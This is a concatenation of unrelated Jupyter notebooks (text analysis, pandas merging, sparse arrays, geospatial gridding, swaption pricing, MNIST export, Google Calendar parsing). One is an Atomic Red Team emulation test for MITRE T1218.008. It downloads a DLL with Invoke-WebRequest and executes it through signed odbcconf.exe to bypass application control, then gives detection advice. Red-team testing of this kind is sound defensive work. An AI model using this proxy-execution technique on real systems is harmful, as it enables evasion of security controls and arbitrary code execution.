# The cool thing is that, in using `nltk` to answer our question, we actually already presented our solution in a manner that can be communicated to other: a frequency distribution plot! You can read off the most common words, along with their frequency. For example, 'whale' is the most common word in the novel (go figure), excepting stopwords, and it occurs a whopping >1200 times!

# ___
# ## BONUS MATERIAL

# As you have seen that there are lots of novels on Project Gutenberg we can make these word frequency distributions of, it makes sense to write your own function that does all of this:

def plot_word_freq(url):
    """Takes a url (from Project Gutenberg) and plots a word frequency distribution.

    Runs the whole pipeline from the session above: fetch the HTML, strip markup
    with BeautifulSoup, tokenize with nltk, lower-case, drop English stopwords,
    and plot the 25 most frequent remaining words.

    Args:
        url: URL of an HTML-formatted Project Gutenberg book.
    """
    # Make the request and check object type
    r = requests.get(url)
    # Extract HTML from Response object and print
    html = r.text
    # Create a BeautifulSoup object from the HTML
    soup = BeautifulSoup(html, "html5lib")
    # Get the text out of the soup and print it
    text = soup.get_text()
    # Create tokenizer
    tokenizer = RegexpTokenizer('\w+')
    # Create tokens
    tokens = tokenizer.tokenize(text)
    # Initialize new list
    words = []
    # Loop through list tokens and make lower case
    for word in tokens:
        words.append(word.lower())
    # Get English stopwords and print some of them
    sw = nltk.corpus.stopwords.words('english')
    # Initialize new list
    words_ns = []
    # Add to words_ns all words that are in words but not in sw
    for word in words:
        if word not in sw:
            words_ns.append(word)
    # Create freq dist and plot
    freqdist1 = nltk.FreqDist(words_ns)
    freqdist1.plot(25)

# Now use the function to plot word frequency distributions from other texts on Project Gutenberg:
#
# * Pride and Prejudice

plot_word_freq('https://www.gutenberg.org/files/42671/42671-h/42671-h.htm')

# * Robinson Crusoe

plot_word_freq('https://www.gutenberg.org/files/521/521-h/521-h.htm')

# * The King James Bible

plot_word_freq('https://www.gutenberg.org/files/10/10-h/10-h.htm')
NLP_FB_live_coding_soln.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Merging and Concatenating Dataframes # # # In this section, you will merge and concatenate multiple dataframes. Merging is one of the most common operations you will do, since data often comes in various files. # # In our case, we have sales data of a retail store spread across multiple files. We will now work with all these data files and learn to: # * Merge multiple dataframes using common columns/keys using ```pd.merge()``` # * Concatenate dataframes using ```pd.concat()``` # # Let's first read all the data files. # + # loading libraries and reading the data import numpy as np import pandas as pd market_df = pd.read_csv("./global_sales_data/market_fact.csv") customer_df = pd.read_csv("./global_sales_data/cust_dimen.csv") product_df = pd.read_csv("./global_sales_data/prod_dimen.csv") shipping_df = pd.read_csv("./global_sales_data/shipping_dimen.csv") orders_df = pd.read_csv("./global_sales_data/orders_dimen.csv") # - # ### Merging Dataframes Using ```pd.merge()``` # # There are five data files: # 1. The ```market_fact``` table contains the sales data of each order # 2. The other 4 files are called 'dimension tables/files' and contain metadata about customers, products, shipping details, order details etc. # # If you are familiar with star schemas and data warehouse designs, you will note that we have one fact table and four dimension tables. 
# # Already familiar with market data: Each row is an order market_df.head() # Customer dimension table: Each row contains metadata about customers customer_df.head() # Product dimension table product_df.head() # Shipping metadata shipping_df.head() # Orders dimension table orders_df.head() # ### Merging Dataframes # # Say you want to select all orders and observe the ```Sales``` of the customer segment *Corporate*. Since customer segment details are present in the dataframe ```customer_df```, we will first need to merge it with ```market_df```. # # Merging the dataframes # Note that Cust_id is the common column/key, which is provided to the 'on' argument # how = 'inner' makes sure that only the customer ids present in both dfs are included in the result df_1 = pd.merge(market_df, customer_df, how='inner', on='Cust_id') df_1.head() # Now, you can subset the orders made by customers from 'Corporate' segment df_1.loc[df_1['Customer_Segment'] == 'CORPORATE', :] # + # Example 2: Select all orders from product category = office supplies and from the corporate segment # We now need to merge the product_df df_2 = pd.merge(df_1, product_df, how='inner', on='Prod_id') df_2.head() # - # Select all orders from product category = office supplies and from the corporate segment df_2.loc[(df_2['Product_Category']=='OFFICE SUPPLIES') & (df_2['Customer_Segment']=='CORPORATE'),:] # # Similary, you can merge the other dimension tables - ```shipping_df``` and ```orders_df``` to create a ```master_df``` and perform indexing using any column in the master dataframe. # # Merging shipping_df df_3 = pd.merge(df_2, shipping_df, how='inner', on='Ship_id') df_3.shape # Merging the orders table to create a master df master_df = pd.merge(df_3, orders_df, how='inner', on='Ord_id') master_df.shape master_df.head() # Similary, you can perform left, right and outer merges (joins) by using the argument ```how = 'left' / 'right' / 'outer'```. 
# ### Concatenating Dataframes
#
# Concatenation is much more straightforward than merging. It is used when you have dataframes having the same columns and want to append them (pile one on top of the other), or having the same rows and want to append them side-by-side.
#
# #### Concatenating Dataframes Having the Same columns
#
# Say you have two dataframes having the same columns, like so:

# +
# dataframes having the same columns
df1 = pd.DataFrame({'Name': ['Aman', 'Joy', 'Rashmi', 'Saif'],
                    'Age': ['34', '31', '22', '33'],
                    'Gender': ['M', 'M', 'F', 'M']}
                   )
df2 = pd.DataFrame({'Name': ['Akhil', 'Asha', 'Preeti'],
                    'Age': ['31', '22', '23'],
                    'Gender': ['M', 'F', 'F']}
                   )
df1
# -

df2

# To concatenate them, one on top of the other, you can use pd.concat
# The first argument is a sequence (list) of dataframes
# axis = 0 indicates that we want to concat along the row axis
pd.concat([df1, df2], axis = 0)

# DataFrame.append() used to be an intuitive alternative for concatenating along
# the rows, but it was deprecated in pandas 1.4 and removed in pandas 2.0 --
# pd.concat() is the supported way (identical result here).
pd.concat([df1, df2], axis = 0)

# #### Concatenating Dataframes Having the Same Rows
#
# You may also have dataframes having the same rows but different columns (and having no common columns). In this case, you may want to concat them side-by-side. For e.g.:

df1 = pd.DataFrame({'Name': ['Aman', 'Joy', 'Rashmi', 'Saif'],
                    'Age': ['34', '31', '22', '33'],
                    'Gender': ['M', 'M', 'F', 'M']}
                   )
df1

df2 = pd.DataFrame({'School': ['RK Public', 'JSP', '<NAME>', '<NAME>'],
                    'Graduation Marks': ['84', '89', '76', '91']}
                   )
df2

# To join the two dataframes, use axis = 1 to indicate joining along the columns axis
# The join is possible because the corresponding rows have the same indices
pd.concat([df1, df2], axis = 1)

# Note that you can also use the ```pd.concat()``` method to merge dataframes using common keys, though here we will not discuss that. For simplicity, we have used the ```pd.merge()``` method for database-style merging and ```pd.concat()``` for appending dataframes having no common columns.

# #### Performing Arithmetic Operations on two or more dataframes
#
# We can also perform simple arithmetic operations on two or more dataframes. Below are the stats for IPL 2018 and 2017.

# +
# Teamwise stats for IPL 2018
IPL_2018 = pd.DataFrame({'IPL Team': ['CSK', 'SRH', 'KKR', 'RR', 'MI', 'RCB', 'KXIP', 'DD'],
                         'Matches Played': [16, 17, 16, 15, 14, 14, 14, 14],
                         'Matches Won': [11, 10, 9, 7, 6, 6, 6, 5]}
                        )

# Set the 'IPL Team' column as the index to perform arithmetic operations on the other rows using the team as reference
IPL_2018.set_index('IPL Team', inplace = True)
IPL_2018
# -

# Similarly, we have the stats for IPL 2017
IPL_2017 = pd.DataFrame({'IPL Team': ['MI', 'RPS', 'KKR', 'SRH', 'KXIP', 'DD', 'GL', 'RCB'],
                         'Matches Played': [17, 16, 16, 15, 14, 14, 14, 14],
                         'Matches Won': [12, 10, 9, 8, 7, 6, 4, 3]}
                        )
IPL_2017.set_index('IPL Team', inplace = True)
IPL_2017

# +
# Simply add the two DFs using the add operator
Total = IPL_2018 + IPL_2017
Total
# -

# Notice that there are a lot of NaN values. This is because some teams which played in IPL 2017 were not present in IPL 2018. In addition, there were also new teams present in IPL 2018. We can handle these NaN values by using `df.add()` instead of the simple add operator. Let's see how.

# The fill_value argument inside the df.add() function replaces all the NaN values in the two dataframes w.r.t. each other with zero.
Total = IPL_2018.add(IPL_2017, fill_value = 0)
Total

# Also notice how the resultant dataframe is sorted by the index, i.e. 'IPL Team' alphabetically.

# +
# Creating a new column - 'Win Percentage'
Total['Win Percentage'] = Total['Matches Won']/Total['Matches Played']
Total

# +
# Sorting to determine the teams with most number of wins. If the number of wins of two teams are the same, sort by the win percentage.
Total.sort_values(by = (['Matches Won', 'Win Percentage']), ascending = False)
# -

# Apart from add(), there are also other operator-equivalent mathematical functions that you can use on Dataframes. Below is a list of all the functions that you can use to perform operations on two or more dataframes
# - `add()`: +
# - `sub()`: -
# - `mul()`: *
# - `div()`: /
# - `floordiv()`: //
# - `mod()`: %
# - `pow()`: **
5__Merging_Concatenating.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .ps1 # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: .NET (PowerShell) # language: PowerShell # name: .net-powershell # --- # # T1218.008 - Signed Binary Proxy Execution: Odbcconf # Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) Odbcconf.exe is digitally signed by Microsoft. # # Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a <code>REGSVR</code> flag that can be misused to execute DLLs (ex: <code>odbcconf.exe /S /A &lbrace;REGSVR "C:\Users\Public\file.dll"&rbrace;</code>). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) # # ## Atomic Tests #Import the Module before running the tests. # Checkout Jupyter Notebook at https://github.com/cyb3rbuff/TheAtomicPlaybook to run PS scripts. Import-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force # ### Atomic Test #1 - Odbcconf.exe - Execute Arbitrary DLL # Execute arbitrary DLL file stored locally. # # **Supported Platforms:** windows # #### Dependencies: Run with `powershell`! 
# ##### Description: T1218-2.dll must exist on disk at specified location (#{dll_payload}) # # ##### Check Prereq Commands: # ```powershell # if (Test-Path PathToAtomicsFolder\T1218.008\src\Win32\T1218-2.dll) {exit 0} else {exit 1} # # ``` # ##### Get Prereq Commands: # ```powershell # New-Item -Type Directory (split-path PathToAtomicsFolder\T1218.008\src\Win32\T1218-2.dll) -ErrorAction ignore | Out-Null # Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/src/Win32/T1218-2.dll" -OutFile "PathToAtomicsFolder\T1218.008\src\Win32\T1218-2.dll" # # ``` Invoke-AtomicTest T1218.008 -TestNumbers 1 -GetPreReqs # #### Attack Commands: Run with `command_prompt` # ```command_prompt # odbcconf.exe /S /A {REGSVR "PathToAtomicsFolder\T1218.008\src\Win32\T1218-2.dll"} # ``` Invoke-AtomicTest T1218.008 -TestNumbers 1 # ## Detection # Use process monitoring to monitor the execution and arguments of odbcconf.exe. Compare recent invocations of odbcconf.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of odbcconf.exe may also be useful in determining the origin and purpose of the DLL being loaded.
playbook/tactics/defense-evasion/T1218.008.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- import numpy as np import sparse import scipy.sparse as ss from GCRS2 import CSR,CSC # The csr/csc arrays shown here are loosely based on the GCRS/GCCS formats presented in [Shaikh et al. 2015](https://ieeexplore.ieee.org/document/7237032). However, I've used a different linearization function where the first half of the axes represent the rows of the underlying sparse matrix and the remaining axes represent the columns. This is in line with numpy's reshape method. In general the compression ratio does not change much as additional dimensions are added to csr/csc and consequently offers much better compression than coo. In principle it should be possible to use these arrays in any place that expects the numpy ndarray API and also anything that works with scipy.sparse matrices. Dask, scikit-learn, and xarray are all good candidates for this. Currently, csr/csc is much faster than coo for indexing 2d arrays, as should be the case. For arrays with more dimensions, the runtime is a bit longer because there are the additional steps of transforming nd-coords to 2d-coords and sometimes a last step of transforming coordinates afterwards. With a few algorithmic improvements and possibly compiling these other steps with numba I suspect that csr/csc will be faster than coo. The csc indexing still has some bugs that I'm working out but csr should mostly work. 1d arrays don't make a ton of sense for csr/csc and it might be best to return a 1d coo array when returning anything 1d. I'm not sure about that though. This codebase is very young and most everything is likely to change. I'm hoping that when it is ready, this code might be merged with pydata/sparse. 
from GCRS2.convert2 import uncompress_dimension def assert_eq(csr,coo): coords = np.vstack((uncompress_dimension(csr.indptr,csr.indices),csr.indices)) assert np.array_equal(coords, coo.reshape(csr.compressed_shape).coords) assert np.array_equal(csr.data, coo.data) coo = sparse.random((10,10,10),density=.2) csr = CSR(coo) assert_eq(csr,coo) # # Indexing # I think there are still a few bugs here and there but a fair amount works. # # - for 2d scipy is still much faster assert_eq(csr[:5,:5,:5],coo[:5,:5,:5]) assert_eq(csr[0,:5,:5],coo[0,:5,:5]) assert_eq(csr[:5,0,:5],coo[:5,0,:5]) assert_eq(csr[:5,:5,0],coo[:5,:5,0]) assert_eq(csr[:5,np.arange(5),0],coo[:5,np.arange(5),0]) coo = sparse.random((1000,1000),density=.2) csr = CSR(coo) scipy_test = coo.tocsr() # %timeit scipy_test[:800,:800] # %timeit csr[:800,:800] # %timeit coo[:800,:800] # # 3D coo = sparse.random((100,100,100),density=.2) csr = CSR(coo) # %timeit csr[:80,:50,:90] # %timeit coo[:80,:50,:90] # # 4D coo = sparse.random((100,100,100,100),density=.2) csr = CSR(coo) # %timeit csr[:80,:80,:80,:80] # %timeit coo[:80,:80,:80,:80] # # Compression # # 2D Density of .2 and .01 #create random sparse array coo = sparse.random((100,100),density=.2) dense = coo.todense() csr = CSR(coo) csc = CSC(coo) print('no. bytes dense: ',dense.nbytes,' storage ratio: ', dense.nbytes/dense.nbytes) print('no. bytes coo: ',coo.nbytes, ' storage ratio: ', coo.nbytes/dense.nbytes) print('no. bytes csr: ',csr.nbytes,' storage ratio: ', csr.nbytes/dense.nbytes) print('no. bytes csc: ',csc.nbytes,' storage ratio: ', csc.nbytes/dense.nbytes) #create random sparse array coo = sparse.random((100,100),density=.01) dense = coo.todense() csr = CSR(coo) csc = CSC(coo) print('no. bytes dense: ',dense.nbytes,' storage ratio: ', dense.nbytes/dense.nbytes) print('no. bytes coo: ',coo.nbytes, ' storage ratio: ', coo.nbytes/dense.nbytes) print('no. bytes csr: ',csr.nbytes,' storage ratio: ', csr.nbytes/dense.nbytes) print('no. 
bytes csc: ',csc.nbytes,' storage ratio: ', csc.nbytes/dense.nbytes) # # 3D Density of .2 and .01 #create random sparse array coo = sparse.random((100,100,100),density=.2) dense = coo.todense() csr = CSR(coo) csc = CSC(coo) print('no. bytes dense: ',dense.nbytes,' storage ratio: ', dense.nbytes/dense.nbytes) print('no. bytes coo: ',coo.nbytes, ' storage ratio: ', coo.nbytes/dense.nbytes) print('no. bytes csr: ',csr.nbytes,' storage ratio: ', csr.nbytes/dense.nbytes) print('no. bytes csc: ',csc.nbytes,' storage ratio: ', csc.nbytes/dense.nbytes) #create random sparse array coo = sparse.random((100,100,100),density=.01) dense = coo.todense() csr = CSR(coo) csc = CSC(coo) print('no. bytes dense: ',dense.nbytes,' storage ratio: ', dense.nbytes/dense.nbytes) print('no. bytes coo: ',coo.nbytes, ' storage ratio: ', coo.nbytes/dense.nbytes) print('no. bytes csr: ',csr.nbytes,' storage ratio: ', csr.nbytes/dense.nbytes) print('no. bytes csc: ',csc.nbytes,' storage ratio: ', csc.nbytes/dense.nbytes) # # 4D Density of .2 and .01 #create random sparse array coo = sparse.random((50,50,50,50),density=.2) dense = coo.todense() csr = CSR(coo) csc = CSC(coo) print('no. bytes dense: ',dense.nbytes,' storage ratio: ', dense.nbytes/dense.nbytes) print('no. bytes coo: ',coo.nbytes, ' storage ratio: ', coo.nbytes/dense.nbytes) print('no. bytes csr: ',csr.nbytes,' storage ratio: ', csr.nbytes/dense.nbytes) print('no. bytes csc: ',csc.nbytes,' storage ratio: ', csc.nbytes/dense.nbytes) #create random sparse array coo = sparse.random((50,50,50,50),density=.01) dense = coo.todense() csr = CSR(coo) csc = CSC(coo) print('no. bytes dense: ',dense.nbytes,' storage ratio: ', dense.nbytes/dense.nbytes) print('no. bytes coo: ',coo.nbytes, ' storage ratio: ', coo.nbytes/dense.nbytes) print('no. bytes csr: ',csr.nbytes,' storage ratio: ', csr.nbytes/dense.nbytes) print('no. 
bytes csc: ',csc.nbytes,' storage ratio: ', csc.nbytes/dense.nbytes) # # 5D Density of .2 and .01 #create random sparse array coo = sparse.random((15,15,15,15,15),density=.2) dense = coo.todense() csr = CSR(coo) csc = CSC(coo) print('no. bytes dense: ',dense.nbytes,' storage ratio: ', dense.nbytes/dense.nbytes) print('no. bytes coo: ',coo.nbytes, ' storage ratio: ', coo.nbytes/dense.nbytes) print('no. bytes csr: ',csr.nbytes,' storage ratio: ', csr.nbytes/dense.nbytes) print('no. bytes csc: ',csc.nbytes,' storage ratio: ', csc.nbytes/dense.nbytes) #create random sparse array coo = sparse.random((15,15,15,15,15),density=.01) dense = coo.todense() csr = CSR(coo) csc = CSC(coo) print('no. bytes dense: ',dense.nbytes,' storage ratio: ', dense.nbytes/dense.nbytes) print('no. bytes coo: ',coo.nbytes, ' storage ratio: ', coo.nbytes/dense.nbytes) print('no. bytes csr: ',csr.nbytes,' storage ratio: ', csr.nbytes/dense.nbytes) print('no. bytes csc: ',csc.nbytes,' storage ratio: ', csc.nbytes/dense.nbytes)
examples.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Applied-Data-Analytics # language: python # name: applied-data-analytics # --- import pandas as pd df = pd.read_csv("/Users/user/Documents/GitHub/Applied-Data-Analytics/Datasets/heights.csv") df df.hist(bins=17)
Chapter01/Activity1.01/Activity1.01.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .jl
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Julia 0.5.0
#     language: julia
#     name: julia-0.5
# ---

# # Example 1 of the "The GMT/MATLAB Toolbox" <NAME>.
# DOI 10.1002/2016GC006723
#
# # Gridding
# This example illustrates the gridding of ship track bathymetry near the Geologists
# seamounts southwest of Hawaii via robust, median-based averaging followed by gridding
# using a minimum curvature spline in tension algorithm. The following commands assume
# the data file, a simple (x y z) ascii file, resides in the current directory.
# The result is visualized with the PyPlot backend of the Plots.jl package. While this
# is a simple example, we note that the blockmedian and surface combination powers the
# creation of many global data sets and that our gridding module surface is widely used
# across all sciences.

using GMT

# Read in the (x y z) ship-track point data as a GMT dataset ("-Td" = read as dataset).
geo = gmt("read -Td geologists.txt");

# Decimate the data by median spatial averaging on a 1 arc-minute lattice (-I1m)
# over the region 158:00W–156:40W / 18:00N–19:40N; the median is robust to outliers.
ave = gmt("blockmedian -R158:00W/156:40W/18:00N/19:40N -I1m", geo);

# Grid the decimated points with a minimum-curvature spline in tension (-T0.2);
# bare -R reuses the region from the previous GMT call.
G = gmt("surface -R -I1m -T0.2", ave);

# Plot the result with Plots
using Plots

# Contour map of the gridded bathymetry, with the block-median points overlaid
# so gridded coverage can be compared against actual data locations.
contour(G.x, G.y, G.z, aspect_ratio="equal")
scatter!(ave[1].data[:,1], ave[1].data[:,2], markersize=0.5, marker=:cross)

# 3-D view; depth is negated so the seamounts render as peaks rather than pits.
surface(G.x, G.y, -G.z, title="Geologists Seamounts")
WL_example_I.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + pycharm={"is_executing": false} from gs_quant.session import Environment, GsSession from gs_quant.instrument import IRSwaption from gs_quant.risk import CurveScenario, MarketDataPattern from gs_quant.markets import MarketDataCoordinate import matplotlib.pyplot as plt import pandas as pd # - # external users should substitute their client id and secret; please skip this step if using internal jupyterhub GsSession.use(Environment.PROD, client_id=None, client_secret=None, scopes=('run_analytics',)) # + pycharm={"name": "#%%\n"} swaption = IRSwaption('Receive', '5y', 'USD', expiration_date='13m', strike='atm') swaption.resolve() # - original_price = swaption.price() market_data = swaption.market().market_data_dict print('Base price: {:,.2f}'.format(original_price)) # + pycharm={"name": "#%%\n"} # Price the swaption under a curve move of 10bp parallel shift parallel_shift_scenario = CurveScenario(market_data_pattern=MarketDataPattern('IR', 'USD'), parallel_shift=10) with parallel_shift_scenario: swaption_parallel_shift = swaption.price() market_data_parallel_shift = swaption.market().market_data_dict print('Price under parallel shift: {:,.2f}'.format(swaption_parallel_shift)) # - # Compare swap rate market data coordinates before and after curve scenario shock coord = MarketDataCoordinate(mkt_type="IR",mkt_asset="USD") market_data_df = pd.DataFrame([{mkt_data.coordinate: mkt_data.value * 1e4 for mkt_data in market_data if (mkt_data.coordinate.mkt_type=="IR" and mkt_data.coordinate.mkt_class=="SWAP")}, {mkt_data.coordinate: mkt_data.value * 1e4 for mkt_data in market_data_parallel_shift if (mkt_data.coordinate.mkt_type=="IR" and mkt_data.coordinate.mkt_class=="SWAP")}], index=['Values', 'Shocked values']).transpose() market_data_df # + # Plotting 
swap rate market data before and after curve scenario shock swap_curve = pd.DataFrame.from_dict({int(''.join(list(filter(str.isdigit, str(v))))): market_data_df.loc[v] for v in market_data_df.index}, orient='index') swap_curve['Shock'] = swap_curve['Shocked values'] - swap_curve['Values'] swap_curve.plot(figsize=(12, 8), title='USD Swap Curve Before and After Parallel Shock') plt.xlabel('Tenor (years)') plt.ylabel('bp')
gs_quant/documentation/02_pricing_and_risk/01_scenarios_and_contexts/examples/04_curve_shock/010400_parallel_curve_shock.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# Dump the MNIST test split to plain-text files (one file per sample, one value
# per line) so a downstream consumer (e.g. a PYNQ/FPGA harness) can read them
# without any Python dependencies.

# +
import os

import numpy as np
import keras
from keras.datasets import mnist
from keras import backend as K
from random import randrange

num_classes = 10

# input image dimensions
img_rows, img_cols = 28, 28

# the data, split between train and test sets
(x_train, y_train), (x_test, y_test) = mnist.load_data()

# Add the channel axis in whichever position the backend expects.
if K.image_data_format() == 'channels_first':
    x_train = x_train.reshape(x_train.shape[0], 1, img_rows, img_cols)
    x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols)
    input_shape = (1, img_rows, img_cols)
else:
    x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)
    x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)
    input_shape = (img_rows, img_cols, 1)

# Scale pixel values from [0, 255] to [0.0, 1.0].
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train /= 255
x_test /= 255

# convert class vectors to binary class matrices (one-hot)
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
# -

print(x_test.shape)
print(y_test.shape)
#print(x_test[0][0][0]


def _dump_values(path, values):
    """Write each value as str(value) on its own line (the original file format)."""
    # 'with' guarantees the file handle is closed even if a write fails;
    # the original open()/close() pair leaked the handle on any exception.
    with open(path, "w") as fo:
        for v in values:
            fo.write(str(v) + '\n')


# write test data x into folder for later usage:
# one file per test image, img_rows*img_cols lines in row-major pixel order.
os.makedirs("test_data_x", exist_ok=True)  # create the folder instead of crashing if absent
for num in range(x_test.shape[0]):         # derived from the data, not a hard-coded 10000
    _dump_values(
        os.path.join("test_data_x", "test_data_x_{}.txt".format(num)),
        (x_test[num][i][j][0] for i in range(img_rows) for j in range(img_cols)),
    )

# write test data y into folder for later usage:
# one file per label, num_classes lines (the one-hot vector).
os.makedirs("test_data_y", exist_ok=True)
for num in range(y_test.shape[0]):
    _dump_values(
        os.path.join("test_data_y", "test_data_y_{}.txt".format(num)),
        (y_test[num][i] for i in range(num_classes)),
    )
pynq_interface_code/get_test_data.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + #ClientID #713695703931-96evkgsumethcakcjq8bmte1blrafv9m.apps.googleusercontent.com #ClientSecret <KEY> from __future__ import print_function import datetime import pickle import os.path from googleapiclient.discovery import build from google_auth_oauthlib.flow import InstalledAppFlow from google.auth.transport.requests import Request # If modifying these scopes, delete the file token.pickle. SCOPES = ['https://www.googleapis.com/auth/calendar.readonly'] """Shows basic usage of the Google Calendar API. Prints the start and name of the next 10 events on the user's calendar. """ creds = None # The file token.pickle stores the user's access and refresh tokens, and is # created automatically when the authorization flow completes for the first # time. if os.path.exists('token.pickle'): with open('token.pickle', 'rb') as token: creds = pickle.load(token) # If there are no (valid) credentials available, let the user log in. 
if not creds or not creds.valid:
    # Refresh an expired token when possible; otherwise run the full OAuth flow.
    if creds and creds.expired and creds.refresh_token:
        creds.refresh(Request())
    else:
        flow = InstalledAppFlow.from_client_secrets_file(
            'credentials.json', SCOPES)
        creds = flow.run_local_server(port=0)
    # Save the credentials for the next run
    with open('token.pickle', 'wb') as token:
        pickle.dump(creds, token)

service = build('calendar', 'v3', credentials=creds)

# Call the Calendar API
now = datetime.datetime.utcnow().isoformat() + 'Z' # 'Z' indicates UTC time
#print('Getting the upcoming 10 events')
events_result = service.events().list(calendarId='<EMAIL>',#幻影戦争
                                      #timeMin=now,
                                      #maxResults=5, #max10
                                      singleEvents=True,
                                      orderBy='startTime').execute()
events = events_result.get('items', [])
if not events:
    print('No upcoming events found.')
# -

import pandas as pd
df = pd.DataFrame(columns=['etag','eid','start','end','category','event'])
df

# +
# Flatten the API events into DataFrame rows. A summary of the form
# "category:event" is split in two; anything else falls back to the
# category 'その他' ("other") with the whole summary as the event text.
for event in events:
    eTag = event['etag']
    eId = event['id']
    start = event['start'].get('dateTime', event['start'].get('date'))
    end = event['end'].get('dateTime', event['end'].get('date'))
    try:
        category, event = event['summary'].split(":")
    except (KeyError, ValueError):
        # ValueError: summary does not split into exactly two parts;
        # KeyError: no 'summary' key. (Previously a bare except:, which also
        # swallowed KeyboardInterrupt/SystemExit.)
        category = 'その他'
        event = event['summary']
    # NOTE(review): DataFrame.append is deprecated and removed in pandas 2.x;
    # if this is ever modernized, collect dicts and build the frame once.
    df = df.append({'etag':eTag, 'eid': eId,'start': start, 'end': end, 'category': category, 'event': event}, ignore_index=True)

df['start'] = pd.to_datetime(df['start'])
df['end'] = pd.to_datetime(df['end'])
df = df.drop_duplicates()
# -

df

# Label-based date slicing against a DatetimeIndex (scratch exploration).
starts = df.set_index(['start'])['2020-10-7':'2020-10-8']
ends = df.set_index(['end'])['2020-10-7':'2020-10-8']

def getSpan(_df, st, ed):
    """Return the rows of _df whose 'start' or 'end' falls inside [st, ed]."""
    #_df[(df['start'] > st) and (df['start'] < ed)]
    # BUG FIX: the upper-bound operand of each condition previously referenced
    # the *global* df instead of the _df parameter, producing a wrong (or
    # misaligned) mask whenever any other frame was passed in.
    _df = _df[( (_df['start'] >= st) & (_df['start'] <= ed) )|( (_df['end'] >= st) & (_df['end'] <= ed) ) ]
    return _df

getSpan(df, '2020-10-7','2020-10-8')

df.drop_duplicates()  # no-op: the result is discarded
df = df.drop_duplicates()

# Scratch cells exploring date arithmetic for "tomorrow" / "next week" / "next month".
import datetime
datetime.datetime.today()
dt = datetime.datetime.today()
d_truncated = datetime.date(dt.year, dt.month, dt.day)  # today at midnight, as a date
d_truncated
d_truncated + datetime.timedelta(days=1)
d_truncated + datetime.timedelta(days=7)
d_truncated + datetime.timedelta(days=-d_truncated.weekday(), weeks=1)  # Monday of next week
# d_truncated + datetime.timedelta(days=-d_truncated.day, months=1)
help(d_truncated.weekday)
d_truncated.day
# d_truncated + relativedelta(day=1, months=1)
from dateutil.relativedelta import relativedelta

for index, row in df.iterrows():
    print(row['start'].strftime('%Y/%m/%d %H') + "' - " + row['end'].strftime('%Y/%m/%d %H') + "'" + " " + row['event'])

# Exercise the helpers from the companion module (module name is spelled 'calender').
from calender import getCalender, getNextMonthCal, getCol, getEventsDf

# +
msg = "test"
msgcontent = "!カレンダ 来月"
msg,df = getCalender(msg, msgcontent)
# -

df

getNextMonthCal()

# Window: first day of next month -> first day of the month two months after that.
dt = datetime.datetime.today()
start = datetime.date(dt.year, dt.month, dt.day)
start = start + relativedelta(day=1, months=1)
end = start + relativedelta(day=1, months=2)
#print(dt, start, end)
df = getCol(start, end)
df

# Window: today -> first day of next month.
dt = datetime.datetime.today()
start = datetime.date(dt.year, dt.month, dt.day)
end = start + relativedelta(day=1, months=1)
df = getCol(start, end)
#print(dt, start, end)
df

# 翌週 (next week): Monday of next week -> Monday of the week after.
dt = datetime.datetime.today()
start = datetime.date(dt.year, dt.month, dt.day)
end = start + datetime.timedelta(days=-start.weekday(), weeks=2)
start = start + datetime.timedelta(days=-start.weekday(), weeks=1)
df = getCol(start, end)
df

# Window: today -> tomorrow.
dt = datetime.datetime.today()
start = datetime.date(dt.year, dt.month, dt.day)
end = start + datetime.timedelta(days=1)
df = getCol(start, end)

def getSpanDf(df, start, end):
    """Return the rows of df that overlap the [start, end) window.

    Comparisons use '%Y/%m/%d %H:%M:%S' strings, which sort chronologically,
    so string comparison is equivalent to time comparison provided df's
    'start'/'end' columns use the same string format — TODO confirm against
    getCol's output.
    """
    st = start.strftime('%Y/%m/%d %H:%M:%S')
    ed = end.strftime('%Y/%m/%d %H:%M:%S')
    print(st, ed)
    # Four overlap cases: event straddles end, event contains window,
    # event straddles start, event entirely inside window.
    df = df[ ((ed > df['start']) & (ed < df['end']))|
             ((st > df['start']) & (ed < df['end']))|
             ((st > df['start']) & (st < df['end']))|
             ((df['start'] > st) & (df['end'] < ed)) ]
    return df

dt = datetime.datetime.today()
start = datetime.date(dt.year, dt.month, dt.day)
